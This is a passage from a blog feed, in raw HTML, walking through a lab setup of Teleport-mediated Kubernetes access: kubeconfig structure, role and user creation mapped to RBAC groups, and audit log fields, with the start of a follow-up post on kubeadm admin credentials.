    <span class="hljs-attr">tls-server-name:</span> <span class="hljs-string">kube-teleport-proxy-alpn.teleport.cluster.local</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">teleport</span>
<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">teleport</span>
    <span class="hljs-attr">extensions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">extension:</span> <span class="hljs-string">kubernetes</span>
      <span class="hljs-attr">name:</span> <span class="hljs-string">teleport.kube.name</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">teleport-kubernetes</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Config</span>
<span class="hljs-attr">preferences:</span> {}
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">exec:</span>
      <span class="hljs-attr">apiVersion:</span> <span class="hljs-string">client.authentication.k8s.io/v1beta1</span>
      <span class="hljs-attr">args:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">kube</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">credentials</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--kube-cluster=kubernetes</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--teleport-cluster=teleport</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--proxy=192.168.64.4:3080</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--insecure</span>
      <span class="hljs-attr">command:</span> <span class="hljs-string">/opt/teleport/system/bin/tsh</span>
      <span class="hljs-attr">env:</span> <span class="hljs-literal">null</span>
      <span class="hljs-attr">provideClusterInfo:</span> <span class="hljs-literal">false</span>
</code></pre>
<h3 id="heading-reading-the-kubeconfig-mostly-right">Reading the kubeconfig (mostly right)</h3>
<p>Teleport injects three major blocks — <strong>cluster</strong>, <strong>context</strong>, and <strong>user</strong> — each representing a layer in the connection chain.</p>
<h4 id="heading-cluster">Cluster</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport</span>
  <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:3080</span>
    <span class="hljs-attr">tls-server-name:</span> <span class="hljs-string">kube-teleport-proxy-alpn.teleport.cluster.local</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
</code></pre>
<ul>
<li><strong>server:</strong> Teleport proxy URL, not direct API server.  </li>
<li><strong>tls-server-name:</strong> SNI/ALPN hint so the proxy knows you’re targeting Kubernetes.  </li>
<li><strong>certificate-authority-data:</strong> CA bundle trusted for proxy cert validation.</li>
</ul>
<h4 id="heading-context">Context</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">teleport</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">teleport-kubernetes</span>
    <span class="hljs-attr">extensions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport.kube.name</span>
      <span class="hljs-attr">extension:</span> <span class="hljs-string">kubernetes</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">teleport-kubernetes</span>
</code></pre>
<ul>
<li><strong>context:</strong> Binds Teleport cluster to Kubernetes user.  </li>
<li><strong>extensions:</strong> Teleport hint for cluster name.  </li>
<li><strong>current-context:</strong> The one <code>kubectl</code> will use.</li>
</ul>
<h4 id="heading-user">User</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">exec:</span>
      <span class="hljs-attr">command:</span> <span class="hljs-string">/opt/teleport/system/bin/tsh</span>
      <span class="hljs-attr">args:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">kube</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">credentials</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--kube-cluster=kubernetes</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--teleport-cluster=teleport</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--proxy=192.168.64.4:3080</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--insecure</span>
      <span class="hljs-attr">apiVersion:</span> <span class="hljs-string">client.authentication.k8s.io/v1beta1</span>
</code></pre>
<ul>
<li><strong>exec.command:</strong> <code>tsh</code> is your auth plugin.  </li>
<li><strong>args:</strong> Mint short-lived credentials on demand.  </li>
<li><strong>apiVersion:</strong> Defines plugin schema for Kubernetes.</li>
</ul>
<p>Each time <code>kubectl</code> runs, it shells out to <code>tsh</code> to request new ephemeral credentials. The proxy validates, maps your Teleport roles to Kubernetes groups, and forwards the request to the actual API server.</p>
<h3 id="heading-confirming-role-mapping">Confirming Role Mapping</h3>
<p>Teleport roles map to Kubernetes RBAC groups. In your case:</p>
<pre><code class="lang-bash">tsh status
...
  Kubernetes users:   teleport-admin
  Kubernetes groups:  system:masters
...
</code></pre>
<p>This gives you cluster-admin privileges because <code>system:masters</code> maps to the built-in <code>cluster-admin</code> ClusterRoleBinding. RBAC we've already learned, but good to check.</p>
<p>Check it with a hacky grep — we’re searching ClusterRoleBindings for any subject bound to <code>system:masters</code>:</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl get clusterrolebindings -o yaml | grep -B20 -A5 <span class="hljs-string">"system:masters"</span>
    name: calico-typha
    namespace: calico-system
- apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRoleBinding
  metadata:
    annotations:
      rbac.authorization.kubernetes.io/autoupdate: <span class="hljs-string">"true"</span>
    creationTimestamp: <span class="hljs-string">"2024-10-17T19:53:04Z"</span>
    labels:
      kubernetes.io/bootstrapping: rbac-defaults
    name: cluster-admin
    resourceVersion: <span class="hljs-string">"134"</span>
    uid: 640338d1-5f25-4c59-bdca-893969ecb818
  roleRef:
    apiGroup: rbac.authorization.k8s.io
    kind: ClusterRole
    name: cluster-admin
  subjects:
  - apiGroup: rbac.authorization.k8s.io
    kind: Group
    name: system:masters
- apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRoleBinding
  metadata:
    annotations:
      meta.helm.sh/release-name: gatekeeper
</code></pre>
<p>Then you can prove this capability out.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ kubectl auth can-i --list | head -n 20
Resources                                       Non-Resource URLs   Resource Names   Verbs
*.*                                             []                  []               [*]
                                                [*]                 []               [*]
selfsubjectreviews.authentication.k8s.io        []                  []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
globalnetworkpolicies.projectcalico.org         []                  []               [get list watch create update patch delete deletecollection]
networkpolicies.projectcalico.org               []                  []               [get list watch create update patch delete deletecollection]
                                                [/api/*]            []               [get]
                                                [/api]              []               [get]
                                                [/apis/*]           []               [get]
                                                [/apis]             []               [get]
                                                [/healthz]          []               [get]
                                                [/healthz]          []               [get]
                                                [/livez]            []               [get]
                                                [/livez]            []               [get]
                                                [/openapi/*]        []               [get]
                                                [/openapi]          []               [get]
                                                [/readyz]           []               [get]
                                                [/readyz]           []               [get]
matt@linux-server-1:~$ kubectl auth can-i delete nodes
Warning: resource <span class="hljs-string">'nodes'</span> is not namespace scoped

yes
</code></pre>
<p>Not too bad so far.</p>
<hr />
<h2 id="heading-comparing-before-and-after-teleport">Comparing Before and After Teleport</h2>
<p>Before Teleport, your kubeconfig looked like this:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:6443</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes</span>
<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">kubernetes</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">kubernetes-admin</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">client-certificate-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
    <span class="hljs-attr">client-key-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
</code></pre>
<p>This default kubeadm config uses <strong>static client certs</strong> with no central control or expiration. If it leaks, it’s effectively unlimited admin access.</p>
<p>After Teleport, things are much better (no forever pass):</p>
<ul>
<li>Short-lived credentials via <code>tsh</code></li>
<li>Proxy-mediated access</li>
<li>Role-based identity enforcement</li>
<li>Automatic expiry &amp; audit</li>
</ul>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Aspect</td><td>Before Teleport</td><td>After Teleport</td></tr>
</thead>
<tbody>
<tr>
<td>Credential type</td><td>Static admin cert</td><td>Short-lived cert via <code>tsh</code></td></tr>
<tr>
<td>Endpoint</td><td>Direct to API server</td><td>Through Teleport proxy</td></tr>
<tr>
<td>Identity</td><td>Hardcoded user</td><td>Role-based (<code>teleport-admin</code>)</td></tr>
<tr>
<td>Expiry</td><td>Manual rotation</td><td>Auto-expires (12h)</td></tr>
<tr>
<td>Audit</td><td>None</td><td>Centralized logs &amp; sessions</td></tr>
</tbody>
</table>
</div><hr />
<h2 id="heading-create-new-roles-and-users">Create New Roles and Users</h2>
<p>We’ll now create a minimal setup:  </p>
<ol>
<li>Teleport role → maps to a Kubernetes group  </li>
<li>Teleport user → inherits that role  </li>
<li>ClusterRoleBinding → grants the group permissions</li>
</ol>
<p>This follows from the <a target="_blank" href="https://goteleport.com/docs/zero-trust-access/rbac-get-started/role-templates/">documentation</a>, but also goes a little deeper.</p>
<h3 id="heading-1-teleport-role-junior-devs-maps-to-k8s-view">1) Teleport Role: <code>junior-devs</code> → maps to K8s <code>view</code>.</h3>
<p>Save the following as <code>junior-devs.yaml</code>. This creates Teleport role that will give our user Kubernetes access.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">kind:</span> <span class="hljs-string">role</span>
<span class="hljs-attr">version:</span> <span class="hljs-string">v7</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">junior-devs</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">allow:</span>
    <span class="hljs-attr">logins:</span> [<span class="hljs-string">'<span class="hljs-template-variable">{{internal.logins}}</span>'</span>]
    <span class="hljs-attr">kubernetes_groups:</span> [<span class="hljs-string">'<span class="hljs-template-variable">{{internal.kubernetes_groups}}</span>'</span>]
    <span class="hljs-attr">node_labels:</span>
      <span class="hljs-string">'*'</span><span class="hljs-string">:</span> <span class="hljs-string">'*'</span>
    <span class="hljs-attr">kubernetes_labels:</span>
      <span class="hljs-string">'*'</span><span class="hljs-string">:</span> <span class="hljs-string">'*'</span>
    <span class="hljs-attr">kubernetes_resources:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">'*'</span>
        <span class="hljs-attr">namespace:</span> <span class="hljs-string">'*'</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">'*'</span>
        <span class="hljs-attr">verbs:</span> [<span class="hljs-string">'*'</span>]
</code></pre>
<p>Apply <strong>on the Auth host</strong> with <code>tctl</code>:</p>
<pre><code class="lang-bash">root@7867833a79e8:~<span class="hljs-comment"># tctl create junior-devs.yaml</span>
role <span class="hljs-string">"junior-devs"</span> has been created
</code></pre>
<h3 id="heading-2-teleport-user-jimbo-with-role-junior-devs">2) Teleport User: <code>jimbo</code> with role <code>junior-devs</code>.</h3>
<p>Save the following as <code>jimbo.yaml</code>. Creates a Teleport user that binds to the Teleport role of <code>junior-devs</code> and the Kubernetes group of <code>teleport-view</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">kind:</span> <span class="hljs-string">user</span>
<span class="hljs-attr">version:</span> <span class="hljs-string">v2</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">jimbo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">roles:</span> [<span class="hljs-string">'junior-devs'</span>]
  <span class="hljs-attr">traits:</span>
    <span class="hljs-attr">kubernetes_groups:</span> [<span class="hljs-string">'teleport-view'</span>]
</code></pre>
<p>Apply <strong>on the Auth host</strong> with <code>tctl</code>:</p>
<pre><code class="lang-bash">root@7867833a79e8:~<span class="hljs-comment"># tctl create -f jimbo.yaml</span>
user <span class="hljs-string">"jimbo"</span> has been created
</code></pre>
<p>To log in as jimbo, you'll need to repeat the user enrollment process again. After creating the user, go to the UI and reset authentication on the jimbo user account. This gave a new link to sign up with OTP (damn OTP, I now have way too many Teleport tokens).</p>
<p>Now for the actual log in:</p>
<pre><code class="lang-bash">matt@linux-server-1:~/teleport$ tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=jimbo --insecure
Enter password <span class="hljs-keyword">for</span> Teleport user jimbo:
WARNING: You are using insecure connection to Teleport proxy https://192.168.64.4:3080
Enter an OTP code from a device:
&gt; Profile URL:        https://192.168.64.4:3080
  Logged <span class="hljs-keyword">in</span> as:       jimbo
  Cluster:            teleport
  Roles:              junior-devs
  Kubernetes:         enabled
  Valid until:        2025-10-20 22:27:09 -0700 PDT [valid <span class="hljs-keyword">for</span> 12h0m0s]
  Extensions:         login-ip, permit-port-forwarding, permit-pty, private-key-policy

matt@linux-server-1:~/teleport$ tsh kube ls
Kube Cluster Name Labels Selected
----------------- ------ --------
kubernetes

matt@linux-server-1:~/teleport$ tsh kube login kubernetes --insecure
Logged into Kubernetes cluster <span class="hljs-string">"kubernetes"</span>. Try <span class="hljs-string">'kubectl version'</span> to <span class="hljs-built_in">test</span> the connection.
</code></pre>
<h3 id="heading-3-kubernetes-clusterrolebinding-for-the-view-group">3) Kubernetes ClusterRoleBinding for the <code>view</code> group</h3>
<p>If you don't have the ClusterRoleBinding you are sort of in a bind.</p>
<pre><code class="lang-bash">matt@linux-server-1:~/teleport$ kubectl get po
Error from server (Forbidden): pods is forbidden: User <span class="hljs-string">"jimbo"</span> cannot list resource <span class="hljs-string">"pods"</span> <span class="hljs-keyword">in</span> API group <span class="hljs-string">""</span> <span class="hljs-keyword">in</span> the namespace <span class="hljs-string">"default"</span>
</code></pre>
<p>Since Teleport injects <code>kubernetes_groups: ["teleport-view"]</code>, you'll need to bind that <strong>group</strong> to the built‑in <code>view</code> role.</p>
<p>Create the <code>ClusterRoleBinding</code> in a separate terminal.</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl create clusterrolebinding teleport-view   --clusterrole=view   --group=teleport-view
clusterrolebinding.rbac.authorization.k8s.io/teleport-view created
</code></pre>
<p>Then verify you can use the view role.</p>
<pre><code class="lang-bash">matt@linux-server-1:~/teleport$ kubectl get po
NAME                        READY   STATUS    RESTARTS       AGE
flask-app-ccb7dbb5b-5x5qw   1/1     Running   5 (45h ago)    19d
nginx-676b6c5bbc-45cmn      1/1     Running   13 (45h ago)   137d
</code></pre>
<p>And that's that.</p>
<h3 id="heading-teleport-ui">Teleport UI</h3>
<p><strong>Teleport Role</strong>: Go to Zero Trust Access -&gt; Roles and choose <strong>Create New Role</strong>. Then supply the name and choose Kubernetes Access with a default Kubernetes resource:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760983797549/d4d3a383-ec2d-470f-b4b0-3b24b160068e.png" alt class="image--center mx-auto" /></p>
<p><strong>Teleport User:</strong> Go to Zero Trust Access -&gt; Users and choose <strong>Create New User</strong>. Then fill in the name, role, and trait (kubernetes_groups).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760983931718/cf326a1a-e72d-4a4e-9054-9ff57166fb42.png" alt class="image--center mx-auto" /></p>
<p><strong>K8s Binding:</strong> Still done in Kubernetes as above.</p>
<h3 id="heading-status-check">Status Check</h3>
<p>This completes a minimal <strong>identity → group → RBAC</strong> pipeline: Teleport defines <em>who Jimbo is</em>, Kubernetes RBAC decides <em>what Jimbo can do</em>. Easily done via code or UI.</p>
<hr />
<h2 id="heading-teleport-kubernetes-audit">Teleport Kubernetes Audit</h2>
<p>Teleport logs every Kubernetes request. You can see this both in proxy logs and the UI. Let's take a look.</p>
<p>This is for a simple request.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ kubectl get deployment
NAME                 STATUS   AGE
calico-apiserver     Active   367d
calico-system        Active   367d
default              Active   367d
...
</code></pre>
<h3 id="heading-proxy-roundtrip-reverse-proxy">Proxy round‑trip (reverse proxy)</h3>
<p>You can find this in the running teleport Docker instance, when you submit a request. The following is a concise parsing of your <strong>proxy round‑trip</strong> log and the corresponding <strong>kube.request</strong> audit event (both the raw line and the UI JSON). </p>
<pre><code class="lang-bash">2025-10-20T05:03:04.563Z INFO [PROXY:PRO] Round trip completed pid:17.1 method:GET url:https://kube-teleport-proxy-alpn.teleport.cluster.local/apis/apps/v1/namespaces/default/deployments?<span class="hljs-built_in">limit</span>=500 code:200 duration:18.776759ms tls.version:772 tls.resume:<span class="hljs-literal">false</span> tls.csuite:4865 tls.server:kube-teleport-proxy-alpn.teleport.cluster.local reverseproxy/reverse_proxy.go:255
</code></pre>
<p><strong>Key fields (what they mean):</strong></p>
<ul>
<li><p><strong>method:</strong> <code>GET</code> — HTTP verb kubectl used.</p>
</li>
<li><p><strong>url:</strong> <code>.../apis/apps/v1/namespaces/default/deployments?limit=500</code> — Exact Kubernetes API path.</p>
</li>
<li><p><strong>code:</strong> <code>200</code> — Upstream API server response.</p>
</li>
<li><p><strong>tls.version / csuite / server:</strong> TLS details for the upstream hop inside Teleport (ALPN → Kube proxy).</p>
</li>
</ul>
<p>This is the raw <strong>transport layer</strong> evidence: Teleport successfully proxied a K8s API call and got a 200 back.</p>
<h3 id="heading-ui-json-same-event">UI JSON (same event)</h3>
<p>Access the Teleport UI and you can view nicely formatted audit logs.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760937189634/24c40da6-9e02-4c76-a76f-027104b1e27e.png" alt class="image--center mx-auto" /></p>
<p>And clicking into details you see the JSON.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760937247587/44b34ba1-605b-4cc0-b22e-5d1a9e75a9de.png" alt class="image--center mx-auto" /></p>
<p>Here it is the actual request in all its glory.</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"addr.remote"</span>: <span class="hljs-string">"192.168.64.8:33222"</span>,
  <span class="hljs-attr">"cluster_name"</span>: <span class="hljs-string">"teleport"</span>,
  <span class="hljs-attr">"code"</span>: <span class="hljs-string">"T3009I"</span>,
  <span class="hljs-attr">"ei"</span>: <span class="hljs-number">0</span>,
  <span class="hljs-attr">"event"</span>: <span class="hljs-string">"kube.request"</span>,
  <span class="hljs-attr">"kubernetes_cluster"</span>: <span class="hljs-string">"kubernetes"</span>,
  <span class="hljs-attr">"kubernetes_groups"</span>: [
    <span class="hljs-string">"system:masters"</span>,
    <span class="hljs-string">"system:authenticated"</span>
  ],
  <span class="hljs-attr">"kubernetes_labels"</span>: {
    <span class="hljs-attr">"teleport.internal/resource-id"</span>: <span class="hljs-string">"11beab83-a0fa-48b5-8e1f-fd454a7f714c"</span>
  },
  <span class="hljs-attr">"kubernetes_users"</span>: [
    <span class="hljs-string">"teleport-admin"</span>
  ],
  <span class="hljs-attr">"login"</span>: <span class="hljs-string">"teleport-admin"</span>,
  <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">"default"</span>,
  <span class="hljs-attr">"proto"</span>: <span class="hljs-string">"kube"</span>,
  <span class="hljs-attr">"request_path"</span>: <span class="hljs-string">"/apis/apps/v1/namespaces/default/deployments"</span>,
  <span class="hljs-attr">"resource_api_group"</span>: <span class="hljs-string">"apps/v1"</span>,
  <span class="hljs-attr">"resource_kind"</span>: <span class="hljs-string">"deployments"</span>,
  <span class="hljs-attr">"resource_namespace"</span>: <span class="hljs-string">"default"</span>,
  <span class="hljs-attr">"response_code"</span>: <span class="hljs-number">200</span>,
  <span class="hljs-attr">"server_hostname"</span>: <span class="hljs-string">"teleport"</span>,
  <span class="hljs-attr">"server_id"</span>: <span class="hljs-string">"785ed329-bb9b-4d16-8904-1b50d75377b5"</span>,
  <span class="hljs-attr">"server_labels"</span>: {
    <span class="hljs-attr">"teleport.internal/resource-id"</span>: <span class="hljs-string">"11beab83-a0fa-48b5-8e1f-fd454a7f714c"</span>
  },
  <span class="hljs-attr">"server_version"</span>: <span class="hljs-string">"18.2.4"</span>,
  <span class="hljs-attr">"sid"</span>: <span class="hljs-string">""</span>,
  <span class="hljs-attr">"time"</span>: <span class="hljs-string">"2025-10-20T05:03:04.565Z"</span>,
  <span class="hljs-attr">"uid"</span>: <span class="hljs-string">"9544742b-2cfa-49d9-abab-edd7e7b06554"</span>,
  <span class="hljs-attr">"user"</span>: <span class="hljs-string">"teleport-admin"</span>,
  <span class="hljs-attr">"user_cluster_name"</span>: <span class="hljs-string">"teleport"</span>,
  <span class="hljs-attr">"user_kind"</span>: <span class="hljs-number">1</span>,
  <span class="hljs-attr">"user_roles"</span>: [
    <span class="hljs-string">"access"</span>,
    <span class="hljs-string">"editor"</span>
  ],
  <span class="hljs-attr">"user_traits"</span>: {
    <span class="hljs-attr">"kubernetes_groups"</span>: [
      <span class="hljs-string">"system:masters"</span>
    ],
    <span class="hljs-attr">"kubernetes_users"</span>: [
      <span class="hljs-string">"teleport-admin"</span>
    ],
    <span class="hljs-attr">"logins"</span>: [
      <span class="hljs-string">"root"</span>,
      <span class="hljs-string">"ubuntu"</span>,
      <span class="hljs-string">"ec2-user"</span>
    ]
  },
  <span class="hljs-attr">"verb"</span>: <span class="hljs-string">"GET"</span>
}
</code></pre>
<p><strong>A Logic of Sorts for the JSON:</strong></p>
<p>Although you can surely decipher most of these, here is a rough map from a less technical point of view. Simple, clean, and fully auditable.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Category</td><td>Fields</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Who</strong></td><td><code>user</code>, <code>login</code>, <code>user_roles</code>, <code>kubernetes_groups</code></td></tr>
<tr>
<td><strong>What</strong></td><td><code>verb</code>, <code>resource_kind</code>, <code>resource_api_group</code></td></tr>
<tr>
<td><strong>Where</strong></td><td><code>namespace</code>, <code>cluster_name</code>, <code>addr.remote</code></td></tr>
<tr>
<td><strong>When</strong></td><td><code>time</code>, <code>uid</code></td></tr>
<tr>
<td><strong>Result</strong></td><td><code>response_code</code></td></tr>
<tr>
<td><strong>Server</strong></td><td><code>server_id</code>, <code>server_hostname</code>, <code>server_version</code></td></tr>
</tbody>
</table>
</div><hr />
<h2 id="heading-wrap-up-access-control-actually-done">Wrap-Up: Access Control, Actually Done</h2>
<p>That’s a wrap — for now — on Teleport and Kubernetes access.</p>
<p>What started as a quick experiment to make kubeconfig a little safer turned into an interesting, albeit time consuming exercise. The more I used Teleport, the more I see how it’s replacing an entire trust model. </p>
<ul>
<li>Short-lived certs instead of forever-tokens</li>
<li>Centralized user and role management</li>
<li>Audit trails that are at your fingertips</li>
</ul>
<p>Teleport is not just for Kubernetes, but it is clearly useful for leveling up Kubernetes RBAC. Teleport isn’t trying to reinvent Kubernetes security; it’s trying to make identity-aware access sane. </p>
<p>I’ll probably revisit this when I start layering in SSO and stuff, but for now? It’s a clean, comprehensible access model that’s hard not to like.</p>
]]></content:encoded></item><item><title><![CDATA[Access Control, Actually: Kubeadm and the Roots of Kubernetes Access]]></title><description><![CDATA[Let’s start simple: you’ve got a Kubernetes cluster running in your lab. How do you get into it?The easiest way — the one you will always use in a lab running on your laptop — is to SSH directly into a node. You run:
matt.brown@matt ~ % ssh matt@192....]]></description><link>https://cloudsecburrito.com/access-control-actually-kubeadm-and-the-roots-of-kubernetes-access</link><guid isPermaLink="true">https://cloudsecburrito.com/access-control-actually-kubeadm-and-the-roots-of-kubernetes-access</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[rbac]]></category><category><![CDATA[Security]]></category><category><![CDATA[authentication]]></category><category><![CDATA[authorization]]></category><category><![CDATA[kubeadm]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 13 Oct 2025 20:58:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760388644975/5dec7779-ac16-46a2-b0ca-91ad77f25ac2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Let’s start simple: you’ve got a Kubernetes cluster running in your lab. How do you get into it?<br />The easiest way — the one you will always use in a lab running on your laptop — is to <strong>SSH directly into a node</strong>. You run:</p>
<pre><code class="lang-bash">matt.brown@matt ~ % ssh matt@192.168.64.15
...
matt@ciliumcontrolplane:~$ kubectl get po
No resources found <span class="hljs-keyword">in</span> default namespace.
</code></pre>
<p>Boom. You’re in. No VPN, no IAM, no hoops. It works because that node has <code>kubectl</code> and a service account with cluster-admin rights. But it’s also the worst possible way to manage access. That SSH key sitting on your laptop? It’s permanent. The cluster logs? They’ll only tell you “user: ubuntu.” If multiple people share that key, you’re in the dark.</p>
<p>This post kicks off a short series exploring how we actually access Kubernetes. From SSH and bastions to identity-aware access with Teleport. The goal is to look at what happens between “I need to connect to that cluster” and “who ran that command.”</p>
<hr />
<h2 id="heading-who-am-i">Who Am I?</h2>
<p>So now that I’m on the node — who exactly <em>am I</em>? Run <code>whoami</code>, and Linux will tell you the obvious.</p>
<pre><code class="lang-bash">matt@controlplane:~$ whoami
matt
</code></pre>
<p>That’s great. I’m <code>matt</code>, local user, shell access confirmed. But who does Kubernetes think I am? The moment I type <code>kubectl get pods</code>, <code>kubectl</code> uses whatever credentials are sitting under <code>~/.kube/config</code> or the node’s service account token.</p>
<p>In practice, that means I’m probably acting as <code>system:admin</code> or a <strong>service account with cluster-admin rights</strong>, because that’s what the node was bootstrapped with.</p>
<p>If I check the current context, I’ll see something like this.</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl config current-context
kubernetes-admin@kubernetes
</code></pre>
<p>Cool — I’m “kubernetes-admin@kubernetes.” Not <em>this</em> admin, not <em>that</em> admin — just <em>kubernetes-admin.</em></p>
<h3 id="heading-contexts-users-and-clusters-a-quick-decoding">Contexts, Users, and Clusters (a quick decoding)</h3>
<p>A Kubernetes <strong>context</strong> is just a tuple that brings together three things from your kubeconfig:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Field</td><td>Meaning</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Cluster</strong></td><td>Which API server you’re talking to (its address and CA cert).</td></tr>
<tr>
<td><strong>User</strong></td><td>Which credential you’re using (client cert, token, exec plugin, etc.).</td></tr>
<tr>
<td><strong>Namespace</strong></td><td>The default namespace for commands when you don’t specify one.</td></tr>
</tbody>
</table>
</div><p>So when <code>kubectl config current-context</code> prints <code>kubernetes-admin@kubernetes</code>, it’s shorthand for: “Use the <em>user</em> <code>kubernetes-admin</code> when connecting to the <em>cluster</em> named <code>kubernetes</code>.” It means the certificate in your kubeconfig file identifies you as the logical user <code>kubernetes-admin</code>.</p>
<p>If you check your kubeconfig (<code>~/.kube/config</code>), you’ll see something like:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">client-certificate-data:</span> <span class="hljs-string">REDACTED</span>
    <span class="hljs-attr">client-key-data:</span> <span class="hljs-string">REDACTED</span>

<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes</span>
  <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">REDACTED</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:6443</span>

<span class="hljs-attr">current-context:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Config</span>
<span class="hljs-attr">preferences:</span> {}

<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
  <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">kubernetes</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">kubernetes-admin</span>
</code></pre>
